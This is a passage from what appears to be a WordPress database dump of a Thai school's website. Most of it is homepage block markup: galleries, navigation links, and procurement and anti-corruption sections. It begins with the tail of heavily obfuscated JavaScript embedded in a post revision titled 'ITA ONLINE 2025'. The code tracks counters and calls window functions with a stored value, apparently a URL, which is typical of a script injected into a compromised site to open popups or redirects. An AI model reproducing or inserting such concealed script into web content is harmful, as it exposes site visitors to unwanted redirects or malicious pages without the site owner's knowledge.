_0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ITA ONLINE 2025','','inherit','closed','closed','','871-revision-v1','','','2025-05-16 14:59:21','2025-05-16 07:59:21','',871,'http://pakhaeng.ssk.in.th/?p=1251',0,'revision','',0),
(1254,1,'2025-05-16 15:11:02','2025-05-16 08:11:02','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a>และอำนาจหน้าที่</td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</td></tr><tr><td>แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</td></tr><tr><td>คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</td></tr><tr><td>ข้อมูลเชิงสถิติการให้บริการ</td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</td></tr><tr><td>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 